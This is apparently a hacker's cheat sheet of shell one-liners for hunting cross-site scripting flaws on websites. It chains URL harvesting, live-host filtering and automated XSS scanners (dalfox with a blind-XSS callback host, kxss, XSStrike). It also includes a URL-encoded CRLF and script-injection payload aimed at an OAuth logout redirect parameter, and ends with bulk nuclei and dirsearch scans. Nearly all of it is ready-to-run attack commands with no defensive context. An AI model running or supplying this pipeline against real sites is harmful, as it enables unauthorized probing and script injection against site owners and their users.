# XSS
echo vulnweb.com | waybackurls | tee domain.txt &&
httpx -l domain.txt -mc 200,302 -o domain200.txt &&
cat domain200.txt | gf xss | sed "s/=.*/=/" | sed "s/URL: //" | tee domain4xss.txt &&
cat urls.txt | uro &&
dalfox file domain4xss.txt -b (xss.ht or collaborator) pipe &&
cat indeed.txt | kxss > xss.txt &&
python XSStrike/xsstrike.py --seeds domain4xss.txt --fuzzer --file-log-level INFO --log-file output.log
cat urls.txt | go run ParamsReflect.go
cat injected_urls.txt | sort -u | httpx -ms "<h1>akira</h1>" -fe "Location: .*<h1>akira</h1>.*" -t 200
####
!cat URlSubs.txt | ~/go/bin/httpx -path "/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert('XSSSS')%3C/script%3E" -ms "XSSSSS" -fe "Location: .*XSSS.*" -t 200 -o xss.txt
# Nuclie

nuclei -l domain200.txt -o data.txt
# dirsearch 
dirsearch -l domain200.txt -e '' -i 200-299 -x 300-599


